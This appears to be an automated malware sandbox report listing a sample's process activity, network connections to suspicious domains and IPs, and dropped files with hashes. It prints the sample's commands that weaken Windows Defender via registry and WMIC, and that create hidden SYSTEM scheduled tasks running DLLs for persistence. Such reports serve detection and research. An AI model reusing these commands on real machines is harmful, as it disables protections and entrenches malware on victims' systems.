forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bqGGCwwWIommTRgeuN"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JipyTrDkU\boZYqC.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "jiLwFdOzPPQiWLm" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "jiLwFdOzPPQiWLm2" /F /xml "C:\Program Files (x86)\JipyTrDkU\sJDXIlv.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "jiLwFdOzPPQiWLm"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "jiLwFdOzPPQiWLm"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "EyAjTIEydjCaoB" /F /xml "C:\Program Files (x86)\tegRANPZONsU2\EfeJCiL.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "nwujZhVsLEYxr2" /F /xml "C:\ProgramData\fcblnlcRRSrBhAVB\sCKcxVb.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "njgsfWmNUCIAXOmvm2" /F /xml "C:\Program Files (x86)\krdeMCnRKomDOvwVunR\yxGEQFa.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ZXdYLGWImophNcyfuyr2" /F /xml "C:\Program Files (x86)\YLgKyOFzWxOqC\iXGtiDm.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "QdCYtDviHOrgqJLgZ" /SC once /ST 01:04:50 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ZmzskowerwXEonlG\aTaLVQIQ\yOpUncv.dll\",#1 /QNPbdidl 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "QdCYtDviHOrgqJLgZ"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZmzskowerwXEonlG\aTaLVQIQ\yOpUncv.dll",#1 /QNPbdidl 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZmzskowerwXEonlG\aTaLVQIQ\yOpUncv.dll",#1 /QNPbdidl 385118

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "WKALCIrwIEiqhKBsn"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5556 -ip 5556

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5812 -ip 5812

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5556 -s 1056

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5812 -s 2304

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "QdCYtDviHOrgqJLgZ"

C:\Program Files (x86)\360\Total Security\PatchUp.exe

"C:\Program Files (x86)\360\Total Security\PatchUp.exe" /down_and_install=0

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
BE 88.221.83.187:443 www.bing.com tcp
RU 147.45.47.70:80 147.45.47.70 tcp
US 8.8.8.8:53 187.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 70.47.45.147.in-addr.arpa udp
RU 185.215.113.67:40960 tcp
DE 185.172.128.33:8970 tcp
US 8.8.8.8:53 67.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 33.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 roomabolishsnifftwk.shop udp
US 104.21.55.87:443 roomabolishsnifftwk.shop tcp
US 8.8.8.8:53 detailbaconroollyws.shop udp
US 104.21.76.102:443 detailbaconroollyws.shop tcp
US 8.8.8.8:53 87.55.21.104.in-addr.arpa udp
US 8.8.8.8:53 museumtespaceorsp.shop udp
DE 23.88.106.134:80 23.88.106.134 tcp
US 104.21.32.80:443 museumtespaceorsp.shop tcp
US 8.8.8.8:53 horsedwollfedrwos.shop udp
US 172.67.157.243:443 horsedwollfedrwos.shop tcp
US 8.8.8.8:53 buttockdecarderwiso.shop udp
US 104.21.45.202:443 buttockdecarderwiso.shop tcp
US 8.8.8.8:53 102.76.21.104.in-addr.arpa udp
US 8.8.8.8:53 134.106.88.23.in-addr.arpa udp
US 8.8.8.8:53 80.32.21.104.in-addr.arpa udp
US 8.8.8.8:53 243.157.67.172.in-addr.arpa udp
US 8.8.8.8:53 patternapplauderw.shop udp
US 104.21.55.248:443 patternapplauderw.shop tcp
US 8.8.8.8:53 averageaattractiionsl.shop udp
US 104.21.62.60:443 averageaattractiionsl.shop tcp
US 8.8.8.8:53 understanndtytonyguw.shop udp
US 104.21.22.94:443 understanndtytonyguw.shop tcp
US 8.8.8.8:53 femininiespywageg.shop udp
US 104.21.71.3:443 femininiespywageg.shop tcp
US 8.8.8.8:53 considerrycurrentyws.shop udp
US 8.8.8.8:53 202.45.21.104.in-addr.arpa udp
US 8.8.8.8:53 248.55.21.104.in-addr.arpa udp
US 8.8.8.8:53 60.62.21.104.in-addr.arpa udp
US 104.21.28.32:443 considerrycurrentyws.shop tcp
US 8.8.8.8:53 employhabragaomlsp.shop udp
US 172.67.203.218:443 employhabragaomlsp.shop tcp
US 8.8.8.8:53 messtimetabledkolvk.shop udp
US 104.21.8.238:443 messtimetabledkolvk.shop tcp
US 8.8.8.8:53 stalfbaclcalorieeis.shop udp
US 104.21.3.197:443 stalfbaclcalorieeis.shop tcp
US 8.8.8.8:53 civilianurinedtsraov.shop udp
US 8.8.8.8:53 94.22.21.104.in-addr.arpa udp
US 8.8.8.8:53 3.71.21.104.in-addr.arpa udp
US 8.8.8.8:53 32.28.21.104.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 218.203.67.172.in-addr.arpa udp
US 172.67.197.146:443 civilianurinedtsraov.shop tcp
US 8.8.8.8:53 deprivedrinkyfaiir.shop udp
US 172.67.134.244:443 deprivedrinkyfaiir.shop tcp
US 8.8.8.8:53 relaxtionflouwerwi.shop udp
US 104.21.76.64:443 relaxtionflouwerwi.shop tcp
RU 5.42.65.67:48396 tcp
US 8.8.8.8:53 238.8.21.104.in-addr.arpa udp
US 8.8.8.8:53 197.3.21.104.in-addr.arpa udp
US 8.8.8.8:53 146.197.67.172.in-addr.arpa udp
US 8.8.8.8:53 244.134.67.172.in-addr.arpa udp
US 8.8.8.8:53 64.76.21.104.in-addr.arpa udp
US 8.8.8.8:53 67.65.42.5.in-addr.arpa udp
US 8.8.8.8:53 yip.su udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 104.21.79.77:443 yip.su tcp
US 8.8.8.8:53 gigapub.ma udp
DE 185.172.128.82:80 185.172.128.82 tcp
US 8.8.8.8:53 f000.backblazeb2.com udp
US 104.153.233.177:443 f000.backblazeb2.com tcp
RU 5.42.66.47:80 5.42.66.47 tcp
FR 51.75.247.100:443 gigapub.ma tcp
US 8.8.8.8:53 free.360totalsecurity.com udp
RU 5.42.66.47:80 5.42.66.47 tcp
US 8.8.8.8:53 235.3.20.104.in-addr.arpa udp
US 8.8.8.8:53 77.79.21.104.in-addr.arpa udp
US 8.8.8.8:53 82.128.172.185.in-addr.arpa udp
NL 151.236.127.172:443 free.360totalsecurity.com tcp
US 8.8.8.8:53 100.247.75.51.in-addr.arpa udp
US 8.8.8.8:53 47.66.42.5.in-addr.arpa udp
US 8.8.8.8:53 177.233.153.104.in-addr.arpa udp
US 8.8.8.8:53 172.127.236.151.in-addr.arpa udp
US 8.8.8.8:53 st.p.360safe.com udp
US 8.8.8.8:53 tr.p.360safe.com udp
US 8.8.8.8:53 s.360safe.com udp
US 8.8.8.8:53 iup.360safe.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 iili.io udp
IE 54.77.42.29:3478 st.p.360safe.com udp
IE 54.77.42.29:3478 st.p.360safe.com udp
US 104.21.235.69:443 iili.io tcp
US 8.8.8.8:53 29.42.77.54.in-addr.arpa udp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
IE 54.76.174.118:80 tr.p.360safe.com udp
DE 52.29.179.141:80 s.360safe.com tcp
DE 52.29.179.141:80 s.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
US 8.8.8.8:53 int.down.360safe.com udp
US 8.8.8.8:53 69.235.21.104.in-addr.arpa udp
US 8.8.8.8:53 118.174.76.54.in-addr.arpa udp
GB 18.245.187.50:80 int.down.360safe.com tcp
GB 18.245.187.120:80 int.down.360safe.com tcp
GB 18.245.187.104:80 int.down.360safe.com tcp
GB 18.245.187.27:80 int.down.360safe.com tcp
GB 18.245.187.50:80 int.down.360safe.com tcp
US 8.8.8.8:53 sd.p.360safe.com udp
GB 18.245.187.27:80 int.down.360safe.com tcp
GB 99.86.249.120:80 sd.p.360safe.com tcp
US 8.8.8.8:53 50.187.245.18.in-addr.arpa udp
US 8.8.8.8:53 120.187.245.18.in-addr.arpa udp
US 8.8.8.8:53 27.187.245.18.in-addr.arpa udp
US 8.8.8.8:53 104.187.245.18.in-addr.arpa udp
US 8.8.8.8:53 120.249.86.99.in-addr.arpa udp
DE 52.29.179.141:80 s.360safe.com tcp
US 8.8.8.8:53 141.179.29.52.in-addr.arpa udp
US 8.8.8.8:53 iplogger.com udp
GB 18.245.187.104:80 int.down.360safe.com tcp
US 172.67.188.178:443 iplogger.com tcp
GB 18.245.187.120:80 int.down.360safe.com tcp
US 8.8.8.8:53 178.188.67.172.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
GB 18.245.187.50:80 int.down.360safe.com tcp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
GB 18.245.187.50:80 int.down.360safe.com tcp
GB 18.245.187.27:80 int.down.360safe.com tcp
GB 18.245.187.104:80 int.down.360safe.com tcp
GB 18.245.187.27:80 int.down.360safe.com tcp
GB 18.245.187.104:80 int.down.360safe.com tcp
GB 18.245.187.120:80 int.down.360safe.com tcp
GB 18.245.187.27:80 int.down.360safe.com tcp
GB 18.245.187.104:80 int.down.360safe.com tcp
GB 18.245.187.50:80 int.down.360safe.com tcp
GB 18.245.187.120:80 int.down.360safe.com tcp
GB 18.245.187.104:80 int.down.360safe.com tcp
GB 18.245.187.50:80 int.down.360safe.com tcp
GB 18.245.187.50:80 int.down.360safe.com tcp
GB 18.245.187.104:80 int.down.360safe.com tcp
GB 18.245.187.50:80 int.down.360safe.com tcp
GB 18.245.187.120:80 int.down.360safe.com tcp
GB 18.245.187.104:80 int.down.360safe.com tcp
GB 18.245.187.50:80 int.down.360safe.com tcp
GB 18.245.187.50:80 int.down.360safe.com tcp
DE 52.29.179.141:80 s.360safe.com tcp
DE 52.29.179.141:80 s.360safe.com tcp
US 8.8.8.8:53 orion.ts.360.com udp
NL 82.145.215.152:443 orion.ts.360.com tcp
US 8.8.8.8:53 152.215.145.82.in-addr.arpa udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 104.21.235.69:443 iili.io tcp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 tconf.cloud.360safe.com udp
IE 54.76.137.217:80 tconf.cloud.360safe.com tcp
IE 54.76.137.217:53 tconf.cloud.360safe.com udp
US 8.8.8.8:53 217.137.76.54.in-addr.arpa udp
US 8.8.8.8:53 u.qurl.cloud.360safe.com udp
IE 54.76.137.217:53 tconf.cloud.360safe.com udp
IE 54.76.137.217:80 tconf.cloud.360safe.com tcp
IE 54.76.137.217:80 tconf.cloud.360safe.com tcp
IE 54.76.29.49:80 tcp
IE 54.76.137.217:53 tconf.cloud.360safe.com udp
IE 54.76.137.217:53 tconf.cloud.360safe.com udp
US 8.8.8.8:53 49.29.76.54.in-addr.arpa udp
IE 54.77.143.119:80 tcp
US 8.8.8.8:53 119.143.77.54.in-addr.arpa udp
US 8.8.8.8:53 s.360safe.com udp
DE 52.29.179.141:80 s.360safe.com tcp
US 8.8.8.8:53 s.360totalsecurity.com udp
NL 82.145.213.43:80 s.360totalsecurity.com tcp
US 8.8.8.8:53 43.213.145.82.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
DE 52.29.179.141:80 s.360safe.com tcp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 spec.cloud.360safe.com udp
US 104.192.108.152:80 spec.cloud.360safe.com tcp
US 8.8.8.8:53 conf.f.360.cn udp
US 8.8.8.8:53 152.108.192.104.in-addr.arpa udp
CN 1.192.137.24:80 conf.f.360.cn tcp
CN 180.163.243.118:80 conf.f.360.cn tcp
IE 54.76.137.217:53 tconf.cloud.360safe.com udp
IE 54.76.137.217:53 tconf.cloud.360safe.com udp
RU 45.142.122.192:47398 tcp
IE 54.76.137.217:53 tconf.cloud.360safe.com udp
US 8.8.8.8:53 192.122.142.45.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 service-domain.xyz udp
US 54.210.117.250:443 service-domain.xyz tcp
US 8.8.8.8:53 250.117.210.54.in-addr.arpa udp
US 8.8.8.8:53 162.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.187.238:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 172.217.16.225:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 106.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 35.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 225.16.217.172.in-addr.arpa udp
GB 142.250.187.238:443 clients2.google.com tcp
IE 54.76.137.217:53 tconf.cloud.360safe.com udp
US 8.8.8.8:53 api2.check-data.xyz udp
US 44.237.26.169:80 api2.check-data.xyz tcp
US 8.8.8.8:53 169.26.237.44.in-addr.arpa udp
US 8.8.8.8:53 tconf.cloud.360safe.com udp
IE 54.76.137.217:53 tconf.cloud.360safe.com udp
IE 54.76.137.217:53 tconf.cloud.360safe.com udp
IE 54.76.137.169:80 54.76.137.169 tcp
US 8.8.8.8:53 169.137.76.54.in-addr.arpa udp

Files

memory/1952-0-0x0000000000FA0000-0x0000000001449000-memory.dmp

memory/1952-1-0x0000000077CF4000-0x0000000077CF6000-memory.dmp

memory/1952-2-0x0000000000FA1000-0x0000000000FCF000-memory.dmp

memory/1952-3-0x0000000000FA0000-0x0000000001449000-memory.dmp

memory/1952-5-0x0000000000FA0000-0x0000000001449000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

MD5 a49d4ea8ceef49682b23f1308f5fce4b
SHA1 eed6afea70bb6655a8d1289ad072a186ee3ed1de
SHA256 cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc
SHA512 1efda3277e81e247645e48cd7cd0537d345cbff187bda289655e60d040d25d529f9f33988d2108321de6b0a387c254b989457a4bf30a1408a3ec162ac6ebdc70

memory/1392-15-0x0000000000910000-0x0000000000DB9000-memory.dmp

memory/1952-18-0x0000000000FA0000-0x0000000001449000-memory.dmp

memory/1392-19-0x0000000000911000-0x000000000093F000-memory.dmp

memory/1392-20-0x0000000000910000-0x0000000000DB9000-memory.dmp

memory/1392-21-0x0000000000910000-0x0000000000DB9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe

MD5 208bd37e8ead92ed1b933239fb3c7079
SHA1 941191eed14fce000cfedbae9acfcb8761eb3492
SHA256 e1fd277ffc74d67554adce94366e6fa5ebc81f8c4999634bcc3396164ba38494
SHA512 a9c3c32573a16b7ca71a12af6e8c8e88502b66bae2465a82dd921fbc6e0c833b9b1c2d436963df189dd9d68568e1be9128826a2e59f1d5fe066b637d2d866715

memory/5000-37-0x00000000003E0000-0x00000000003E1000-memory.dmp

memory/5000-39-0x00000000003E0000-0x00000000003E1000-memory.dmp

memory/4208-38-0x0000000000400000-0x0000000000592000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe

MD5 84bf36993bdd61d216e83fe391fcc7fd
SHA1 e023212e847a54328aaea05fbe41eb4828855ce6
SHA256 8e6d8b5a004c8f21bee1bbe4213c6d78cf80e439b38f587e963e9bb4569aaffa
SHA512 bb3241949618ad2d39057e085e150f43b4d41d74efc4658d9c27f8c0ec80420191517a2c0b6b7e225c4e50e02cd031cdfd178e05b9a869847a3c27b210d09caf

memory/4328-60-0x0000000000BB0000-0x0000000000C02000-memory.dmp

memory/4328-61-0x0000000005990000-0x0000000005F34000-memory.dmp

memory/4328-62-0x00000000054C0000-0x0000000005552000-memory.dmp

memory/4328-63-0x0000000005580000-0x000000000558A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Tmp6A14.tmp

MD5 1420d30f964eac2c85b2ccfe968eebce
SHA1 bdf9a6876578a3e38079c4f8cf5d6c79687ad750
SHA256 f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9
SHA512 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe

MD5 15a7cae61788e4718d3c33abb7be6436
SHA1 62dac3a5d50c93c51f2ab4a5ebf78837dc7d3a9f
SHA256 bed71147aa297d95d2e2c67352fc06f7f631af3b7871ea148638ae66fc41e200
SHA512 5b3e3028523e95452be169bdfb966cd03ea5dbe34b7b98cf7482ca91b8317a0f4de224751d5a530ec23e72cbd6cc8e414d2d3726fefee9c30feab69dc348fa45

C:\Users\Admin\AppData\Roaming\configurationValue\One.exe

MD5 816df4ac8c796b73a28159a0b17369b6
SHA1 db8bbb6f73fab9875de4aaa489c03665d2611558
SHA256 7843255bc50ddda8c651f51347313daf07e53a745d39cc61d708c6e7d79b3647
SHA512 7dd155346acf611ffaf6399408f6409146fd724d7d382c7e143e3921e3d109563c314a0367a378b0965e427470f36bf6d70e1586d695a266f34aebd789965285

C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe

MD5 c4ffab152141150528716daa608d5b92
SHA1 a48d3aecc0e986b6c4369b9d4cfffb08b53aed89
SHA256 c28de1802bdbcf51c88cd1a4ac5c1decb0558fa213d83833cf5dbd990b9ae475
SHA512 a225e98f2bc27e2add9d34bd850e0e66a27bd1db757c979639a636a6efe412e638025c6e235c36188a24c9af2bde4b17d1dbaa0707dce11411402cd5de8024e9

memory/3728-108-0x0000000000320000-0x0000000000372000-memory.dmp

memory/4328-97-0x0000000006140000-0x00000000061B6000-memory.dmp

memory/4328-114-0x0000000006A10000-0x0000000006A2E000-memory.dmp

memory/4328-137-0x0000000006C20000-0x0000000006C32000-memory.dmp

memory/4328-138-0x0000000006C80000-0x0000000006CBC000-memory.dmp

memory/4328-136-0x0000000006CE0000-0x0000000006DEA000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-4124900551-4068476067-3491212533-1000\76b53b3ec448f7ccdda2063b15d2bfc3_310807ab-751f-4d81-ae09-b202eaf21e19

MD5 7d8e2485108589f16378230324aeb2c5
SHA1 567c35370a709502d544c0cc4e1553cd67c7d5f1
SHA256 5df3d6489aedb5d2f3f60c897e05ede745e91ea72c65704d2d2d54d630752138
SHA512 e35d996e9863c2bddbde1de0a04c053a17ad930e04ed0d039412f2789774264c834ccd46484bf413f236e961d30d1acf762b56e6c8f49e24da180bb7163a2597

memory/4328-132-0x0000000007190000-0x00000000077A8000-memory.dmp

memory/4328-140-0x0000000006DF0000-0x0000000006E3C000-memory.dmp

C:\Users\Admin\Desktop\Microsoft Edge.lnk

MD5 425d1698cf2c3d8df8b419ca63ad4773
SHA1 337d26694ab542d4a075d71b4b14bb23d3cd42d9
SHA256 396a476efe715fc3621669f347d7ec6f2a7b2b820dd74bad3bd8a6e973a0911d
SHA512 0542a627290dfba6da25482570d87ab4d2b45f5be9a724f7e1e3ddfd87745e6c2543d4a2e48a9de63e7738d84296ab5dc2cb52108a688243ff9306eb2da36339

C:\Users\Public\Desktop\Google Chrome.lnk

MD5 2154471ee95b28cec3d0050632a6ea19
SHA1 5a4e8ddcbb9d9863e9c9f450fca90448f1dcc305
SHA256 8a56104819a595229abaa45637c86ddfa4e6292c2db9231a648b0b5dcb02db64
SHA512 8d22d30f9d87fbb6a5111e50f9a152280f92dcd65190b493028ec63700edd5d83c88f4d8797f6574fa1151768bd9af1688afcbb9df86577beddeef25e3a6d31f

memory/4292-145-0x0000000000DB0000-0x0000000000E1C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe

MD5 0b7e08a8268a6d413a322ff62d389bf9
SHA1 e04b849cc01779fe256744ad31562aca833a82c1
SHA256 d23a10b3ff0c565ea8ee7f54bcded0582e1e621ebad69d4523d6746f6d8e0e65
SHA512 3d226673e30bbbc27e0a5a6c64bf81eca475c697486b20141df7975bef97901d4865b88f41937f5e3dd00b437f24f91493f80cb69aa366b7a49cd17b26197ba4

memory/1828-165-0x0000000000400000-0x0000000000455000-memory.dmp

memory/3160-164-0x0000000000D20000-0x0000000000D21000-memory.dmp

memory/1828-163-0x0000000000400000-0x0000000000455000-memory.dmp

memory/3360-169-0x0000000000400000-0x0000000000459000-memory.dmp

memory/3260-168-0x0000000000DF0000-0x0000000000DF1000-memory.dmp

memory/3360-167-0x0000000000400000-0x0000000000459000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe

MD5 05b11e7b711b4aaa512029ffcb529b5a
SHA1 a8074cf8a13f21617632951e008cdfdace73bb83
SHA256 2aab2ca39749b21877d1c52526009f9f5d251d934205e9f671a9e84cecd55afa
SHA512 dde7b561ffb3b9fe71827be9313cd3b83900c3ce76b053d028e84223fba1b06035437b3860a74de7dc2f5d40f0b90bd7d60139701d752c803eb08f362a5d57ff

memory/4024-187-0x0000000002320000-0x0000000002321000-memory.dmp

memory/2248-186-0x0000000000400000-0x000000000063B000-memory.dmp

memory/2248-188-0x0000000000400000-0x000000000063B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe

MD5 a991da123f34074f2ee8ea0d798990f9
SHA1 3988195503348626e8f9185747a216c8e7839130
SHA256 fd42e618223f510d694c5fb2f8ecbc1a88cabf003bcf20da6227da30a1352a0f
SHA512 1f958cacb820833ea8b5ac2d9ca7f596625e688f8f6b6e3ab6f27aa3b25b8c9e5b57e1eed532a8d2519da6c1b41492eb8ac930fc25eaf2be2f344c2f32e81a49

memory/3184-207-0x000001F122A90000-0x000001F122ACC000-memory.dmp

memory/3728-208-0x00000000066A0000-0x0000000006706000-memory.dmp

memory/4292-215-0x000000001BEC0000-0x000000001BEFC000-memory.dmp

memory/4292-214-0x000000001BE60000-0x000000001BE72000-memory.dmp

memory/4292-213-0x000000001E920000-0x000000001EA2A000-memory.dmp

memory/1392-216-0x0000000000910000-0x0000000000DB9000-memory.dmp

memory/3184-218-0x000001F1247F0000-0x000001F12484C000-memory.dmp

memory/3184-217-0x000001F122ED0000-0x000001F122ED6000-memory.dmp

memory/4292-219-0x000000001ED30000-0x000000001EDA6000-memory.dmp

memory/4292-220-0x000000001BEA0000-0x000000001BEBE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_stewaln1.drg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5112-222-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2648-232-0x000001A4B8650000-0x000001A4B8672000-memory.dmp

memory/3728-233-0x0000000007420000-0x0000000007470000-memory.dmp

C:\Users\Admin\Pictures\l6Bw5qI801CLBPG4VraE7oce.exe

MD5 77f762f953163d7639dff697104e1470
SHA1 ade9fff9ffc2d587d50c636c28e4cd8dd99548d3
SHA256 d9e15bb8027ff52d6d8d4e294c0d690f4bbf9ef3abc6001f69dcf08896fbd4ea
SHA512 d9041d02aaca5f06a0f82111486df1d58df3be7f42778c127ccc53b2e1804c57b42b263cc607d70e5240518280c7078e066c07dec2ea32ec13fb86aa0d4cb499

memory/4292-245-0x000000001F580000-0x000000001F742000-memory.dmp

memory/4292-246-0x000000001FC80000-0x00000000201A8000-memory.dmp

C:\Users\Admin\Pictures\jfwLrbtuGmt3WgBnEjEXTdp4.exe

MD5 cd4acedefa9ab5c7dccac667f91cef13
SHA1 bff5ce910f75aeae37583a63828a00ae5f02c4e7
SHA256 dd0e8944471f44180dd44807d817e0b8a1c931fc67d48278cdb7354d98567e7c
SHA512 06fae66da503eb1b9b4fbe63a5bb98c519a43999060029c35fe289e60b1cb126a6278c67ce90f02e05b893fcaea6d54f9deb65bc6da82561487a7754f50c93d1

C:\Users\Admin\Pictures\UBjA5DPMgvprl58O4Rm6wkOw.exe

MD5 ef65292d26c79999f9cd88fc202e257e
SHA1 bb1022e9d3d345f14db1f7e431d4d63259fa3ac2
SHA256 4bd44fc79eff569312def70fb850c7f168e84d039f4d1d23b7a4927338476222
